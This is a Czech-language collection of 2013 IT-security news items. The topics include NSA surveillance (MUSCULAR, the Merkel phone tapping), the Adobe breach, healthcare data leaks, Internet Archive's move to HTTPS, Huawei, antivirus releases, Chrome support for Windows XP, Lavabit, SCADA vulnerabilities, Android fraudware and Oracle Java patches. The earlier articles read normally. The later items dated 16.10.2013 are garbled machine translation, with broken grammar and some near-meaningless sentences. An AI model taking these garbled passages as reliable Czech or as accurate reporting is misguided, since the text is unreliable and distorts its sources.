Podle Washington Postu nové informace z dokumentů, které odtajnil Edward Snowden, popisují program s názvem MUSCULAR, přes který mohli američtí a britští agenti zasahovat do optických kabelů a kopírovat tak přenášená data.
Alexander, který řekl, že o tom nic neví, také připomněl, že mediální zprávy z dřívějška o programu PRISM, který média popsala jako „zadní vrátka“ byly „fakticky nepřesné“.
„NSA se do databází nevkrádá. Bylo by to vysoce nelegální. Takže nevím, co v té zprávě je, ale mohu vám říct, že přístup na servery Googlu ani Yahoo nemáme,“ oznámil. „Nemáme autorizaci prohledávat servery amerických společností a kopírovat jejich data. Aby bylo něco takového možné, muselo by to být schváleno soudně.“
Když byl Alexander dotázán na to, zda data z amerických společností, které NSA uvedla ve svém přehledu, byla získána soudním příkazem, odpověděl: „Přesně tak.“
MUSCULAR však operuje mimo Spojené státy, kde na NSA neplatí stejná omezení jako při domácích operacích. „Taková široká sbírka internetového obsahu by byla ve Spojených státech nelegální. Operace však probíhají v zahraničí, kde může NSA předpokládat, že je každý, kdo používá zahraniční datové linky, cizinec,“ popsal magazín.
Takže PRISM sice funguje pod dohledem soudu pro zahraniční zpravodajství, pro MUSCULAR však žádné podobné opatření neexistuje. Dříve v tomto roce NSA podala zprávu, podle které nasbírala za 30 dní více než 180 milionů záznamů.
Toto obvinění pravděpodobně naruší důvěru zahraničních firem a zákazníků ještě více. Už dříve celá řada poskytovatelů cloudu informovala, že zákazníci se začínají obávat ukládat svá data v amerických firmách, o své informace se začínají bát a tento strach byl Snowdenovým odhalením ještě umocněn.
Poté, co společnosti zjistily, že se potýkají s nedostatkem důvěry, několik z nich včetně Googlu a Yahoo začalo vyhledávat oprávnění zveřejňovat více informací o tom, jaká data zpravodajským službám poskytují. Ministerstvo spravedlnosti však takovým žádostem odolává.
Útok na Adobe: Prolomeno přes 38 miliónů účtů
3.11.2013 Incident | Kriminalita | Hacking
Uživatelů poškozených při posledním rozsáhlém průniku do databází Adobe je nakonec mnohem více, než společnost původně přiznávala.
Za útokem na GMail stála chyba v přehrávači Flash Player
Začala nová vlna útoků přes SQL injection
Podle nejnovějšího zjištění společnosti Adobe došlo k odcizení přístupových údajů k účtům více než 38 miliónů aktivních uživatelů. Původní zpráva přitom hovořila o 2,9 miliónu napadených účtů.
Útočníci rovněž získali přístup k blíže nespecifikovanému množství účtů nevyužívaných po dobu dvou let či déle.
Kyberzločincům se vedle toho podařilo odcizit části zdrojového kódu populárního grafického nástroje Photoshop. Stejný osud postihl i Acrobat, program pro úpravu PDF dokumentů, a ColdFusion, nástroj pro vývoj webových aplikací.
Analýzou informací získaných ze zdrojových kódů si mohou útočníci udělat dobrý obrázek o funkcích programů a pokusit se pak tyto techniky napodobit.
Důvod, proč původní zpráva obsahovala špatná čísla, je podle mluvčí Adobe jednoduchý. Společnost tehdy zkrátka ještě neznala přesný rozsah škod. „Zveřejnili jsme proto jen ty informace, u kterých jsme si byli 100% jisti,“ řekla mluvčí.
Adobe nicméně věří, že k odcizení informací o kreditních kartách, expiračních datech a dalších dat spojených s uživatelskými objednávkami došlo „jen“ u původních tří miliónů účtů. Ze zbývajících 35 miliónů účtů si prý útočníci odnesli „pouze“ uživatelská ID a hesla.
Společnost již preventivně změnila přístupová hesla ke všem zneužitých účtům. To však útočníkům nijak nezabrání v přístupu na uživatelské účty u jiných služeb, pokud k nim zákazníci Adobe přistupují pomocí stejných jmen a hesel.
Podle Briana Krebse, známého bezpečnostního blogera, který na zneužití účtů upozornil jako první, se milióny uživatelských jmen a hesel objevily na fóru navštěvovaném kyberzločinci o minulém víkendu. Podle mluvčí Adobe byl již dokument z fóra na žádost společnosti odstraněn.
Informace o pacientech v ohrožení
3.11.2013 Hrozby | Bezpečnost
Ve zdravotnictví vznikají citlivá data, která je třeba chránit. Často se také mění právní normy, které určují jejich ochranu. Poskytovatelé péče se potýkají stejně jako firmy s úniky dat vzniklými ať již neopatrností pracovníků či cíleným působením kyberzločinců.
Data o pacientech, know-how a duševní vlastnictví jsou hlavními zdroji informací organizací zabývajících se zdravotní péčí. Potýkají se s výzvou, jak chránit data, a zároveň čelí stále výraznějším bezpečnostním hrozbám, měnícím se legislativním požadavkům, a to vše na pozadí snižování výdajů, počtu zaměstnanců a dalších organizačních změn.
Na základě celosvětového průzkumu společnosti Deloitte je možné přiblížit typy nejčastějších úniků dat ve zdravotnictví. V 71 procentech pocházejí z prostředí zdravotnických zařízení, 16 procent ze zdravotních pojišťoven a třináct procent od ostatních subjektů působících ve zdravotnictví.
Se stále rostoucím důrazem na ochranu dat respondenti přikládají větší význam řízení přístupu a kontrole identity. Odpovědi ukazují, že řízení přístupu je a nadále bude jejich hlavní prioritou. Tento trend je však patrný i v jiných odvětvích. Organizace chtějí poskytnout zaměstnancům a třetím stranám nástroje, které zajistí jejich vzdálený a bezpečný přístup k aplikacím a infrastruktuře.
Ztráta a únik informací plynoucí z nedostatečného řízení přístupu k informacím jsou problémy, které se jednoznačně týkají všech respondentů výzkumu. Únikem je chápán pohyb informačních aktiv z důvěryhodných zdrojů k nevhodným, nedovoleným či veřejným nositelům, což představuje potenciální riziko a negativní dopad pro organizaci.
Jedním ze způsobů, jak se chránit před únikem dat, je implementace systému DLP (Data Leakage Prevention), který pomáhá držet data ve správných rukách. Stále se však objevují případy, kdy poskytovatel zdravotní péče měl například nechráněný web, jenž obsahoval jména, adresy, telefonní čísla a laboratorní výsledky pacientů, což je v rozporu se zákonem. Tehdy je třeba rychle přijmout bezpečnostní opatření.
Únik informací sám o sobě může i nemusí způsobit společnosti újmu, ale obecně znamená, že došlo k porušení bezpečnostních podmínek, nedostatku povědomí o bezpečnosti či k jinému pochybení. Ačkoli má pouze malé procento respondentů výzkumu v současné době implementovanou technologii DLP – v porovnání s velkou skupinou používající firewally a antivirová řešení – je to technologie, na kterou se plánují v blízké době zaměřit.
Vysoké náklady
Většina organizací (a to nejen v oblasti zdravotnictví) si DLP technologie osvojuje relativně pomalu. Hlavním důvodem jsou bezesporu vysoké náklady spojené s implementací tohoto řešení. Jejich obhajoba je mnohdy neřešitelným úkolem, protože zdravotnické organizace již investovaly do zabezpečení využívané infrastruktury. Nicméně při rozhodování o implementaci DLP hraje výraznou roli jeho pokrytí téměř všech zdrojů úniků dat.
Informační bezpečnost v oboru, jako je zdravotnictví, představuje základní stavební kámen, protože uchovávaná data patří mezi nejcitlivější. Pro zajištění potřebné úrovně ochrany dat tak nestačí formálně zdokumentovaná strategie informační bezpečnosti, protože jednou z nejčastějších příčin úniku je lidská chyba. Je proto nutné přijmout takové prvky ochrany (jako je například DLP), které omezují lidská pochybení.
Únik dat v organizacích zabývajících se zdravotní péčí bývá přičítán především nedostatečnému prosazování již exitujících právních předpisů, zvyšujícímu se podílu informačních technologií, všudypřítomnosti sociálních médií a potenciálu pro zpeněžení osobních zdravotních informací neoprávněnými uživateli.
Důsledky úniku dat mohou být pro organizaci velmi významné – poškození dobrého jména a peněžní sankce patří mezi ty, o kterých se nejvíce hovoří. Přesto většina zdravotnických organizací nedisponuje vhodnou ochranou, která by pomohla tomuto jednání zabránit, protože mají velmi omezené rozpočty na ochranu, monitorování a obnovu IT.
Internet Archiv v obavách o data nasazuje šifrování
3.11.2013 Šifrování | Bezpečnost
Neziskový web bude ukládat méně dat uživatelů a přejde na bezpečný protokol HTTPS.
Internet Archive, online úložiště milionů digitalizovaných knih, chce chránit své čtenáře před tajným špehováním – například ze strany americké vlády.
Internet Archive na základě pomoci více než 15 milionů uživatelů a 850 přispívajících knihoven bezplatně nabízí přes 5 milionů elektronických knih na adrese archive.org a 2 milionů knih na openlibrary.org.
V čtvrtek během akce, která se konala v sídle Internet Archivu v San Francisku, nezisková organizace ohlásila nové funkce a prvky na ochranu soukromí, které mají především ztížit monitorování chování a návyků čtenářů na jejím webu. Především půjde o bezpečný protokol HTTPS, který bude standardně zapnut (nebude tedy povinný, ale ti, kdo jej z nějakého důvodu nebudou chtít používat, si jej budou muset sami vypnout). Protokol HTTPS byl navržen tak, aby bránil odposlouchávání a takzvaným útokům pomocí prostředníka, a očekává se, že jej začne brzy používat většina uživatelů.
I v tomto případě jsou hlavním důvodem ke změnám v postoji k ochraně soukromí a chování organizace stále ještě se rozrůstající skandál PRISM týkající se rozsahu špehování světového internetu a všech jeho uživatelů americkou agenturou NSA. Internet Archive ve svém pátečním blogu uvádí: „Na základě faktů o plošném odposlouchávání veškerého toku informací po Internetu nyní šifrujeme a maskujeme chování našich čtenářů a jejich výběr webových stránek od jejich prohlížeče až k našemu webu.“
Blog ve svém zdůvodnění specificky poukázal na XKeyscore agentury NSA. Nástroj XKeyscore umožňuje analytikům NSA prohledávat obrovské množství emailů, rychlých zpráv a historie prohlížeče bez předchozí autorizace.
Internet Archive se také zaměřil na to, aby zkomplikoval rekonstrukci toho, jak se uživatelé chovají. Všechny adresy IP uložené na serverech domén archive.org a openlibrary.org budou zašifrovány. Implementace serverů byla změna tak, že adresy IP jednotlivých uživatelů budou šifrovány klíčem, který se bude měnit každý den. To dle slov organizace umožní vyhodnocovat množství uživatelů využívajících její služby, ale bez možnosti jednoduše je identifikovat či určit, odkud se připojují.
Toto vše se dotýká přes 3 milionů uživatelů, které se podle Internet Archivu každý den připojují k jejich serverům. Používání protokolu HTTPS bude standardizováno i pro uživatele služby Wayback Machine, která umožňuje prohlížet předchozí verze webů na internetu.
Webové servery většinou ukládají adresy IP do svých logů, což umožňuje zpětně určit, kdo se kdy na co díval, ale podle slov Internet Archivu se organizace snaží vyhnout ukládání adres klientů již několik let.
Internet Archive ohlásil ještě řadu dalších iniciativ, které již nejsou svou povahou bezpečnostní. Pro ty ze svých uživatelů, kteří mají sklony k nostalgii, byl vytvořen „Historical Software Archive“ – který bude sbírat software platforem, které jsou již záležitostí časů minulých, a umožňoval jejich spuštění v emulaci běžící v současných prohlížečích.
Dále vznikl archiv televizních zpravodajství, který umožňuje podle klíčových slov prohledat 491 000 zpráv, které byly za poslední 4 roky nahrány z amerických televizních stanic a pustit si je v podobě videoklipu. Archiv je pravidelně aktualizován o starší materiály a nové zprávy jsou přidávány 24 hodin po jejich odvysílání.
Huawei: Chceme být otevření a transparentní
3.11.2013 IT | Hardware
Čínská společnost Huawei chce být transparentnější, aby svět přesvědčila o tom, že se nesnaží sledovat globální komunikaci pro čínskou vládu.
Společnost založil bývalý vojenský důstojník Žen Čeng-fej v roce 1987 a celých 25 let držel většinu obochodních operací v tajnosti, ale nyní se společnost rozhodla, že začne být otevřenější. „Chceme být otevření a transparentntí a chceme, aby lidé rozuměli tomu, kdo jsme,“ řekl Skott Sykes, vedoucí oddělení pro mezinárodní mediální styk. „Oproti nedávné minulosti je to velká změna.“
Huawei se doposud soustředil na porozumění obchodním výzvám, na výzkum a na vývoj nových produktů. „Mysleli jsme, že se všechno ostatní vyřeší samo, ale to mohlo být trochu naivní,“ přiznal.
Společnost sídlící v Šen-čenu měla za minulý rok obrat 35,4 miliard dolarů. Obvykle své výrobky prodává operátorům, ale nedávno se začala soustředit i na firmy, což znamená, že je pod větším tlakem společnosti.
„Je důležité, aby lidé věděli, kdo jsme a jaké jsou naše záměry,“ dodal Sykes a vysvětlil, že je pro Huawei kvůli čínskému sídlu transparentnost důležitější než pro ostatní.
Huawei publikuje své roční finanční výsledky již od roku 2000. Tento rok má však výsledky pro audit KPMG mnohem detailnější, zpráva má více než 100 stran.
„Dnes uveřejňujeme informace, o kterých by veřejná společnost ani nepřemýšlela, a to i přesto, že k tomu nejsme nikým nuceni a nemáme takovou povinnost, vzhledem k tomu, že jsme soukromá společnost,“ dodal Sykes.
Nejvíce problémů má Huawei ve Spojených státech, které se obávají, že čínská firma svá zařízení vylepšuje zadními vrátky, které může využít čínská vláda ke špehování americké komunikace.
„Pokud ukončíme obchodní vztah s USA, důvodem bude jejich protekcionismus,“ řekl Sykes. „Samozřejmě je to o něco komplikovanější. Mohla by se k tomu přidat i politika a možná sinofóbie, ale hlavním důvodem je obchodní protekcionismus. Jsme připraveni, ochotni a dostupní sloužit operátorům a zákazníkům ve Spojených státech, ale pravdou je, že v dohledné budoucnosti nevidíme žádnou významnou obchodní příležitost.“
I přesto však Huawei věří, že se časem přístup USA změní. „Jednoho dne snad vyhraje pragmatizmus,“ řekl. „ Žádné jednoduché řešení této výzvy neexistuje.“
Huawei ve středu oznámil, že zajistil smlouvu za 700 milionů dolarů. Nahradí výbavu dánského mobilního operátora TDC (kterou dosud zajišťoval konkurenční Ericsson) svými vlastními výrobky.
Zda snaha o transparentní přístup něco změní, se teprve uvidí, ale cíl společnosti – dosáhnout ročního obratu 60 miliard do roku 2017 – na tom pravděpodobně závisí.
NSA údajně odposlouchávala Angelu Merkelovou
3.11.2013 Špionáž | Bezpečnost
Německý ministr zahraničí si pozval na kobereček amerického ambasadora v Berlíně, aby spolu probrali nařčení, že byl americkými tajnými službami odposloucháván telefon kancléřky Angely Merkelové.
Mluvčí Ministerstva zahraničí potvrdila, že americký ambasador v Německu John Emerson se sešel s ministrem zahraničí Guido Westerwellem včera odpoledne a byl informován o pozici německé vlády k celé věci. Mluvčí německé vlády Steffen Seibert ve středu v tiskovém prohlášení uvedl, že podle jejich informací byl mobilní telefon Angely Merkelové monitorován americkými tajnými službami.
Merkelová se o celé věci bavila s prezidentem Barakem Obamou a údajně mu důrazně řekla, že s takovými praktikami jednoznačně nesouhlasí a jsou podle ní naprosto nepřijatelné. Monitorování komunikace mezi spřátelenými vládami by se podle Merkelové jednoduše nemělo vyskytovat. Během telefonického rozhovoru Obama Merkelovou ujistil, že Spojené státy „komunikaci Merkelové neodposlouchávají a odposlouchávat nebudou.“
Po setkání s ambasadorem Westerwelle uvedl: „Potřebujeme zjistit pravdu, a potřebujeme ji hned.“ Šéf sekretariátu Merkelové Ronald Potalia, jenž je také zodpovědný za výkon dohledu nad německými tajnými službami, následně dodal, že Berlín dal Washingtonu na předložení důkazů v celé kauze ultimátum. Potalia řekl, že Berlín trvá na zodpovězení všech svých otázek. Problém špionáže spolu mezi čtyřma očima řešili Merkelová a francouzský prezident Hollande také na summitu EU. Vysoký francouzský představitel následně dodal, že Němci a Francouzi chtějí svou odezvu Američanům koordinovat.
Německá kancléřka očekává, že Američané svou nevinu dokáží. Věc se řeší na úrovni vysokých představitelů obou vlád v Berlíně a Washingtonu. Setkání Němců s Američany navazuje na zprávy z uplynulých několika měsíců, které poukazovaly na praktiky americké vládní agentury NSA. Informace o špehování NSA se začaly objevovat v červnu, když britský list Britský deník The Guardian začal zveřejňovat materiály o rozsáhlých odposleších a sběru dat, jež zpřístupnil bývalý zaměstnanec NSA Edward Snowden.
NSA monitorovala (a nejspíše stále monitoruje) jak americké telefonní hovory, tak komunikaci v zámoří. Na počátku tohoto týdne se také objevily informace o tom, že Američané špehovali prezidenty cizích států. V pondělí si francouzský ministr zahraničí Laurent Fabius předvolal amerického ambasadora, aby mu tento vysvětlil, zda NSA špehovala francouzské telekomunikační společnosti a shromažďovala data o milionech hovorů. V úterý pak oznámila mexická vláda, že NSA nejspíše sledovala e-mailovou konverzaci tamního prezidenta.
Antimalware ve verzích 2014 má Avast i TrustPort
3.11.2013 Software | Ochrana
Avast 2014, nejnovější verzi svých antivirových řešení, uvedl na trh Avast Software. Nabízí mimo jiné takzvané boot-time skenování či funkci Do Not Track.
Ta uživatelům nejprve umožňuje vidět, které firmy sledují jejich on-line chování, a následně si vybrat, kterým to opravdu umožní.
V placených variantách je funkce SafeZone, jež poskytuje dodatečnou ochranu při finančních transakcích, či technologie DeepScreen, která umožňuje vyčistit falešné kódy, falešná přesměrování a jiné techniky, které tvůrci malwaru používají k maskování svých skutečných záměrů.
Pomocí odstraňování vrstev neznámého kódu dokáže Avast sledovat binární úroveň příkazů vmalware, a lépe tak pochopit skryté instrukce v něm obsažené. Novinkou je i funkce Hardened Mode, která lidem dovoluje přejít na whitelisted režim, jenž blokuje soubory, u kterých není jasné, zda jsou infikované.
Svůj antimalware ve verzi 2014 uvedl na trh i TrustPort. Nejmarkantnější změnou je nové grafické rozhraní, které se přizpůsobilo vzhledu Windows 8 a optimalizovalo se pro použití s dotykovými displeji. Vývojáři také zrychlili skenování u všech implementovaných motorů a zjednodušili systém aktualizací softwaru. Uživatel si také může nastavit více profilů a nadefinovat vlastní pravidla firewallu a konfigurací pro více sítí.
Dva nové moduly – Skytale a Portunes, umožňují všechna citlivá data vzájemně synchronizovat přes cloudové úložiště mezi počítačem i mobilním přístrojem. Skytale šifruje SMS zprávy a krátké textové zprávy v e-mailovém klientovi, Portunes zase nabízí uživateli šifrovanou ochranu pro data, jako jsou hesla, PIN či soukromé poznámky.
Chrome pro Windows XP bude podporován do roku 2015
3.11.2013 Bezpečnost
Zatímco Microsoft končí s vydáváním aktualizací pro svůj nejpopulárnější operační systém všech dob již 8. dubna 2014, Google přislíbil aktualizace svého prohlížeče pro Windows XP nejméně o rok déle.
„Prodlužujeme podporu Chromu pro Windows XP a budeme dále vydávat standardní aktualizace i bezpečnostní opravy nejméně do dubna 2015,“ oznámil ve středu Mark Larson, ředitel pro vývoj Chromu, na firemním blogu. Google má v úmyslu „podporovat uživatele Chromu pro XP během jejich procesu přechodu na jinou verzi systému,“ dodal Larson. Poukazuje tak na fakt, že 12 let starý systém používá stále poměrně mnoho uživatelů, přestože Microsoft jeho podporu ukončí již za půl roku.
Miliony, možná i stovky milionů počítačů budou tento systém používat i po dubnu příštího roku, což by mohla být pro webové prohlížeče konkurenční výhoda. Zatímco Internet Explorer je podporován do verze 8 (vydané v roce 2009, aktuální je verze 11) a i tato podpora v dubnu skončí, Chrome se dočká standardních aktualizací i nadále. Mohl by tedy potenciálně získat stávající uživatele Internet Exploreru 8 nebo staršího.
Mnoho bezpečnostních poradců uživatelům Windows XP doporučuje v dubnu 2014 přejít na jiný prohlížeč, který nebude tolik náchylný neoprávněným průnikům. Žádný software není dokonalý a bezpečnostní výzkumníci i kyberzločinci stále odhalují nové a nové bezpečnostní díry, které výrobci softwaru průběžně záplatují. Čím déle bude Internet Explorer k dispozici bez bezpečnostních aktualizací, tím více bezpečnostních rizik bude obsahovat.
Podle společnosti Net Appliacations, která mimo jiné sleduje, z jakých operačních systémů uživatelé přistupují na web, je Windows XP nainstalován zhruba ve 35 % počítačů s Windows. Drží si tak s přehledem druhou příčku za nejpopulárnějšími Windows 7 s podílem 51 %.
Chrome nebude jediným podporovaným prohlížečem po dubnu 2014. Pokračování v podpoře přislíbily i Mozilla (pro svůj Firefox) a Opera.
Lavabit dává uživatelům možnost zotavit se E-mail Archives
16.10.2013 IT | Software
Lavabit , dnes uzávěrkou bezpečný poskytovatel e-mailu, který se stal něco jako shromažďovací místo pro obhájců soukromí a bezpečnostní odborníky v probíhající ságy dozoru NSA, dává svým bývalým uživatelům až ve čtvrtek v noci změnit svá hesla na službu. Budou pak mít krátkou okno pro stažení své e-mailové archivy a získat jejich data účtu.
Ladar Levison, zakladatel Lavabit, v srpnu se rozhodl pro dramatický pohyb vypnutí služby spíše než dávat vládě široký přístup k údajům svých uživatelů. FBI, v návaznosti na Edwarda úniků Snowdena metod sledování NSA, šel do Levison se soudním příkazem náročné SSL klíče pro společnosti služby. Spíše než aby poslechl, což Levison řekl znamenaly smrt pro Lavabit služby tak, on rozhodl se vypnout bezpečný e-mailový systém. Ministerstvo spravedlnosti nebyl rád, říkat nejméně, ale Levison se natáhl a nedávno podala odvolání soudního rozhodnutí.
Mezitím Levison zabezpečil nový certifikát pro Lavabit místě, a oznámí uživateli , že mají až čtvrtek v devatenáct hodin CDT jít na nové stránky a měnit svá hesla. Po tom, oni pak budou mít pár dní jít a stáhnout své archivované e-maily a další data.
"Vzhledem k obavám o zachování integrity hesel zákazníků, nabízíme krátký okno pět dní, ve kterých mohou uživatelé změnit své heslo, než jsme, aby někdo stáhnout archiv svých uložených e-mailů," prohlášení o novém Lavabit stránky říká.
"Vzhledem k tomu, že SSL certifikáty dříve používané na ochranu přístupu k Lavabit byla ohrožena, doporučujeme ručně ověření sériového čísla a otisk počítač přijatou před použitím této webové stránce."
Levison řekl, že odstávka Lavabit ovlivnila ho také, jak byl uživatel služby sám a strávil roky budování společnosti.
"To je v návaznosti na náhlé odstavení Lavabit uplynulém srpna, přičemž mnozí byli ponecháni bez způsobem uplatňovat svá citlivá data. Pro ty, kteří používají Lavabit e-mailovou službu, byly ponechány bez způsob přístupu k informacím po vypnutí. Když byl dotázán, jak jeho uživatelé cítili o ztrátě osobních údajů, pane Levison řekl "Já jsem na stejné lodi jako oni. Použil jsem Lavabit e-mailový účet po dobu 10 let. Byl to můj jediný e-mailový účet "," příkaz řekl.
Obrázek z Flickr fotky z Richard-G .
Bug Lovci najít 25 ICS, SCADA zranitelnosti
16.10.2013 Zranitelnosti | Bezpečnost
Trojice vědců odhalila 25 bezpečnostních zranitelností v různých dispečerské řízení a sběr dat (SCADA) a průmyslové řídicí systém (ICS) protokoly.
Výzkumníci, Adam Crain, Chris Sistrunk a Adam Todorski i když Todorski dosud nebyla připsána zjištění některého z popsaných chyb, se provádí tento výzkum se sponzorstvím od Automatak, firma - začal Crain -, který poskytuje podporu zabezpečení tvůrci a údržbáři těchto druhů ICS a SCADA zařízení, které ovládají většinu světového kritické infrastruktury a průmyslových strojů.
Dosud vědci zveřejnili podrobnosti o pouhých devět zranitelností, z nichž každá je vzdáleně zneužít, když tvrdí, že objevili dalších 16 chyb, ale podrobnosti těchto chyb jsou projednávány jak komunikovat s postiženými dodavatelů. Každý zveřejněny chyba se zdá, že byla potvrzena a stanoví prodejce, i když to neznamená, že správci na zranitelné systémy jsou nainstalovány záplaty.
Všechny jejich výzkum je součástí projektu ROBUS. Odvození jeho jméno z latinského podstatného jména za zdroj síly, projekt probíhá hledání Zero Day zranitelnosti v softwaru SCADA a ICS. Je i přes své odpovědnosti za kontrolu hodně z největších světových kritické infrastruktury a průmyslových procesů, SCADA a ICS protokoly jsou notoricky náchylné k využití, zejména pokud jde o realitu danou human spoléhání se na vodě a elektráren.
Konkrétně Crain a Sistrunk odhalil dvě chyby v IOServer. Nesprávné zabezpečení ověření vstupu v DNP3 software ovladače a další ve stejném kusu hlavního nádraží softwaru. Každá chyba by mohla způsobit nekonečnou smyčku, pokud by útočník měl odeslat speciálně vytvořený paket TCP. Jediná cesta ven ze smyčky by bylo provést ruční restart.
Pár také našel DNP3 ověřování vstupu v reálném čase Schweitzer Engineering Laboratories automatizačních řídicích využitelných za obdobných podmínek. Útočník by mohl poslat do zařízení do nekonečné smyčky, a, v závislosti na nastavení zařízení, mohou být její regulátory znovu načíst nastavení konfigurace po restartu.
Crain a Sistrunk také stanoveno, že by odeslat speciálně vytvořený paket TCP do Kepware Technologies DNP ovladač master pro KEPServerEX komunikační platformu tím, že využívá ještě další ověření vstupu zranitelnost. Výsledkem opět bude nekonečná smyčka, ale také odmítnutí služby stavu. Tento systém by vyžadovat restartování počítače za účelem navrácení. V podstatě stejná chyba zabezpečení v ovladači hlavní DNP pro TOP OPC serveru serveru, roztroušená Triangle MicroWorks "výrobky, některé součásti třetích stran a MatrikonOPC SCADA DNP3 OPC serveru.
Poslední dvě chyby v softwaru, existují podsíti Solutions rozvodny Server a Alstom e-terracontrol software. Každé chybě zabezpečení by mohl útočník schopnost ovlivnit dostupnost příslušných výrobků.
Potenciální dopad všech těchto chyb samozřejmě závisí na konfiguraci nastavení zařízení.
Vědci objevili tyto nedostatky pomocí vlastní čipové fuzzer, že vám dá přístup veřejnosti k jako open source nástroj v březnu.
Automatak tvrdí, že odhaluje zranitelnost vůči prodávajícím a ICS-CERT, práce s postiženými prodejců ověřit opravy a zlepšení testování.
Real-time operační riziko a sledování dodržování
16.10.2013 Hrozby | Zabezpečení | Bezpečnost
Corvil oznámila v reálném čase pro všeobecné použití rizik a dodržování monitorovací řešení pro všechny druhy elektronických obchodních firem. Řešení sleduje a zachycuje všechny informace, které se přenáší na síťové vodiče s nulovým dopadem na plnění obchodních systémů a neměnností vyžaduje stávající software. Pomocí datové sítě drátěné, je schopen samostatně sledovat 100% všech aktivit uvnitř i ven z firmy zákazníka. To může sledovat objednávky uskutečněné a přijaté souhrnné výplní, včetně těch, které jsou neočekávané a neoprávněná. Corvil průběžně analyzuje drát dat, zjišťuje obchodních událostí a také sleduje stavu systému v reálném čase. Nadřízení jsou si vědomi hrozeb anomáliích, a chyby během několika vteřin. Corvil upozornění lze vkládat přímo do automatizovaných procesů, které mohou vymáhat limity pozic, zprávy sazeb v zabij přepínače nebo vyvažování zátěže. Typický CorvilNet nasazení může zachytit miliony obchodování souvisejících zpráv za sekundu, z odposlechů, agregační přepínače nebo i softwarové protokoly, a pak dekódovat, korelují, analyzovat a upozorňovat v reálném čase. Data mohou být uloženy pro historické analýzy a mohou být exportovány do externích systémů pomocí mnoha standardních rozhraní. Nejnovější verze CorvilNet přináší řadu nových funkcí, včetně živého aktualizaci obrazovky zobrazující přesně to, co se děje právě teď přes celý obchodní systém. Díky použití CorvilLens, plně integrovaný real-time sítě, aplikací a obchodně-specifické výhled je na jedné obrazovce. Nové oznámení na základě uživatelem definovaných událostí lze použít k omezení obchodování nebo upozornění pracovníků finančně ohrožujících událostí. Automatického zjišťování schopnosti a konfigurovatelný reporting okna snadnost integrace a probíhající operace.
Fraudware virus cílení Android uživatelé v Číně a jihovýchodní Asii
16.10.2013 Viry | Mobil
NQ Mobile identifikovala, "Poznej App", nový fraudware virové hrozby zaměření Android uživatelé v Číně a některé země v jihovýchodní Asii. "Poznej App", identifikován jako a.frau.longjian.a, zdá Android uživatelům aktualizaci k extrémně populární NetDragon 91 Assistant app. Pokud se uživatel rozhodne pro aktualizaci této podvodné aplikace, automaticky se stáhne další přebalených aplikace na pozadí, které spotřebovávají data uživatele. Hlavní hanebné chování těchto přeměněných aplikací jsou:
Přihlásit se k odběru poplatků založených služeb prostřednictvím SMS bez vědomí uživatele, což má za následek nechtěné vyúčtování poplatků
Přístup a sbírat různé informace o zařízení uživatele, jako například informace o telefonu (např. telefonní číslo, IMEI, IMSI) a uživatelská aplikace, napadající soukromí uživatele.
V době, kdy identifikace a očkování, se počet infekcí byly identifikovány jako 193 uživatelů v kombinaci pevninské Číny, Angola, Hong Kongu, Iráku, Macao, Malajsie, Singapuru, Tchaj-wanu a Vietnamu.
Oracle Čtvrtletní aktualizace obsahuje opravy pro 50 dálku spustitelné chyby Java
16.10.2013 Zranitelnosti | Update
V úterý se poprvé byly Java aktualizace zabezpečení součástí čtvrtletního Oracle Critical Patch Aktualizace - a stejně rychle, Java neztrácel čas zvedat se jako nejlepší starost o Oracle adminy a odborníků v oblasti bezpečnosti.
Z 51 záplat Java uvolněných, 50 umožnit vzdálené spuštění kódu a 20 dostali nejvyšší hodnocení kritičnosti Oracle.
"Většina chyb se soustředí na straně klienta v jazyce Java, tedy ve stolních / notebook nasazení, s nejčastější způsob útoku je prohlížení internetu a škodlivé webové stránky, ale tam jsou dvě vysoce kritické chyby, které se rovněž vztahují na serverové nasazení," řekl Qualys CTO Wolfgang Kandek.
Uživatelé jsou vyzýváni, aby okamžitě upgradovat na verzi Java 7 Update 45; Java 6 instalace jsou také citlivé na téměř tucet kritických chyb, odborníci a dodal, že uživatelé by se měli vyhnout umožňuje plug-in zcela nebo izolovat Java 6 strojů.
"V ideálním případě budou uživatelé vypnout Java plugin, pokud to není výslovně nutné a spusťte jej pouze v prohlížeči, který můžete použít pouze pro ty, jednu nebo dvě stránky, které vyžadují plugin," řekl Ross Barrett, vedoucí bezpečnostní inženýr Rapid7. "Jinak, spouštět aplikace Java v nejvíce omezeném režimu a umožňují pouze podepsané applety z bílé památek zapsaných ke spuštění."
Java 6, je však již nejsou podporovány společností Oracle a bezpečnostních záplat nejsou vyvíjeny.
"Doporučené akce pro Java 6 zde je upgrade na Java 7, pokud je to možné," řekl Kandek. "Pokud nelze upgradovat, bych doporučil izolovat stroj, který potřebuje Java 6 běží a nepoužívejte jej k jiným činnostem, které se připojují do Internetu, jako je například e-mail a prohlížení."
Odborníci připomínají, že uživatelé i nejnovější Java aktualizace také zahrnuje podepsání kódu omezení a pop-upy varování uživatelů, které nepodepsané aplety Java představovat bezpečnostní riziko, a že nebudou provádět automaticky ve výchozím nastavení.
Známý Java chyba lovec Adam Gowdiak řekl Threatpost, že opravy i ztvrdlé interakce LiveConnet kódu, prohlížeč, funkce, která umožňuje applety komunikovat s motorem javascript v prohlížeči a Java Rich Internet Applications.
"Díky této souvislosti jsou některé další varovné dialogy se uživateli zobrazí před umožňující volání z JavaScriptu Java," Gowdiak a dodal, že Oracle také oprava a reflexní API zranitelnost podal na společnost.
Na straně serveru byly záplatované CVE-2013-5782 a CVE-2013-5830. Chyby byly nalezeny v Oracle JRockit, Java Virtual Machine postaven do jejího Oracle Fusion Middleware.
"Kromě oprav Java, nic jiného, vyskočí za mimořádně zajímavé," řekl Barrett Rapid7 je.
Celkově lze říci, že jsou 127 skvrny na CPU Oracle, které se dotýkají většina z produktové řady Oracle. Kromě zranitelností Java, jen jiná chyba blíží stejnou úroveň kritičnosti je MySQL Enterprise Monitor, ale to není vzdálené spuštění chyba. MySQL Enterprise Monitor je real-time management rozhraní, které bdí nad databází MySQL pro výkon, dostupnost a bezpečnost.
Databáze manažeři by měli být informováni o čtyři záplaty pro RDBMS Oracle, z nichž všechny jsou vzdáleně zneužít, když poukazuje na to, že Kandek Oracle databáze nejsou vystaveny na internetu.
K dispozici je 17 záplaty pro Oracle Fusion Middleware, tucet z nich jsou vzdáleně zneužít. Zvenčí v dokumentu komponentní Fusion používá také v Microsoft Exchange instalace je také oprava v této aktualizaci. Funkce získal nějakou pozornost s aktualizací Microsoft srpna Patch Tuesday . Útočník by mohl získat vzdálený přístup nalákat uživatele k otevření nebezpečného souboru s aplikací Outlook Web Access.
